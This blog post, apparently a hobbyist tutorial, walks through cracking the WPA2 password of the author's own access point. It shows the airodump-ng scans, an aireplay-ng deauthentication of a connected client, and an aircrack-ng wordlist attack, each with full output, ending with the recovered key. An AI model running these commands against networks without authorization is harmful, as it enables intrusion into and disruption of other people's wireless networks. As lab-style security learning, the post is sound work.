Home Wifi Hacking Part 1
Post
Cancel

Wifi Hacking Part 1

Wifi Hacking Part 1

WPA Handshake

A WPA handshake is a series of frames that are sent between a AP and a client to authenticate the client. These frame have the ability to be cracked using various tools. Once these frames are crack the WIFI password can be obtained for that network. I ran sudo airmon-ng start INTERFACE before starting this attack chain

I started off with a basic capture to see what AP’s are around. I have a access point of Zon that I will be targeting

1
2
3
4
5
6
7
8
9
10
11
12
13
sudo airodump-ng wlan0mon

CH  8 ][ Elapsed: 0 s ][ 2023-04-28 22:17 

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 34:98:B5:47:AB:AE   -1        0        0    0   8   -1                    <length:  0>                                                    
 34:98:B5:3E:51:A0  -52        3        0    0   9  130   WPA2 CCMP   PSK  Woot                                                        
 60:38:E0:93:28:43  -60        1        0    0   7  130   WPA2 CCMP   PSK  Dog                                                        
 30:46:9A:A6:34:76  -27        5        0    0   1  130   WPA2 CCMP   PSK  Zon                                                            
 D2:B4:F7:BE:12:DA  -63        2        0    0   1  360   WPA2 CCMP   PSK  <length:  0>                                                    
 5C:64:8E:BB:B3:31  -65        3        0    0   1  405   WPA2 CCMP   PSK  SUMMER                                                 
 5C:64:8E:BB:B4:75  -65        4        0    0   1  405   WPA2 CCMP   PSK  Snow  

Handshake Capture With De-Auth

One way to capture a WPA handshake is to DeAuth an already connected client. In the snip below I ran airodump-ng to target the bssid of my router --bssid, on channel 1 -c 1, and wrote it to a file called zon.cap -w zon.cap. The output shows that there is one client connected to the Zon AP and is sending frames.

1
2
3
4
5
6
7
8
9
10
11
sudo airodump-ng wlan0mon --bssid 30:46:9A:A6:34:76 -c 1 -w zon.cap

CH  1 ][ Elapsed: 2 mins ][ 2023-04-28 21:45 ]

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 30:46:9A:A6:34:76  -16 100     1357     1511    0   1  130   WPA2 CCMP   PSK  Zon                                                        

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 30:46:9A:A6:34:76  FC:77:74:8E:3F:B4  -26   24e- 6e     0     1622  PMKID

One option to get the WPA handshake would be to wait until the client disconnects and then reconnects. This could happen if the devices leaves the AP’s range and then comes back into its range, or the device reboot’s, or really anything that could cause a WPA handshake. Another option is to us aireplay-ng and send some DeAuth frames to tell the AP to disconnect from the client. To do this, continue to run the airodump-ng capture and send a DeAuth frame. In the snip below that is exactly what happens. Running aireplay-ng sends a DeAuth frame with -0 1 to my access point -a 30:46:9A:A6:34:76, with the connected host -c FC:77:74:8E:3F:B4 on the wlan0mon interface.

1
2
3
4
┌──(zonifer㉿linux)-[~]
└─$ sudo aireplay-ng -0 1 -a 30:46:9A:A6:34:76 -c FC:77:74:8E:3F:B4 wlan0mon
21:44:50  Waiting for beacon frame (BSSID: 30:46:9A:A6:34:76) on channel 1
21:44:50  Sending 64 directed DeAuth (code 7). STMAC: [FC:77:74:8E:3F:B4] [ 0|42 ACKs]

Back on the airodump-ng output up at the top WPA handshake: 30:46:9A:A6:34:76 is new. Signifying that a new handshake has occurred. I have successfuly de-authenticated the host and when it tried to connect back captured the handshake.

1
2
3
4
5
6
7
8
9
CH  1 ][ Elapsed: 2 mins ][ 2023-04-28 21:45 ][ **WPA handshake: 30:46:9A:A6:34:76** 

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 30:46:9A:A6:34:76  -16 100     1357     1511    0   1  130   WPA2 CCMP   PSK  Zon                                                        

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 30:46:9A:A6:34:76  FC:77:74:8E:3F:B4  -26   24e- 6e     0     1622  PMKID  

Sticking with the air suite I’ll use aircrack-ng, a custom word list -w wordlist.txt (a small rockyou), an essid of Zon -e Zon, a bssid of 30:46:9A:A6:34:76 -b 30:46:9A:A6:34:76, on the recent capture called zon.cap-01.cap zon.cap-01.cap In just a short amount of time this is cracked and the wifi password is found.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
sudo aircrack-ng -w wordlist.txt -e Zon -b 30:46:9A:A6:34:76 zon.cap-01.cap

                               Aircrack-ng 1.6 

      [00:00:00] 8/102 keys tested (100.82 k/s) 

      Time left: 0 seconds                                       7.84%

                           KEY FOUND! [ Zonifer1 ]


      Master Key     : 8C 29 D8 06 12 FE 70 86 7D 7E 48 6F 09 9C 6B BC 
                       14 11 C0 96 EE DA 4B FC B4 65 DA 6E AE 08 B5 FC 

      Transient Key  : 1D F2 27 91 A5 35 41 CE FD 8B 69 C5 26 75 3A 07 
                       2A 79 8E 77 0C 01 CB 20 29 FB 0B 1B C8 3A 42 96 
                       64 F1 16 2A 83 20 8F 75 63 A8 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : BB 06 27 45 F6 9E 24 3F 76 AF 24 93 6A 3C 61 51 
This post is licensed under CC BY 4.0 by the author.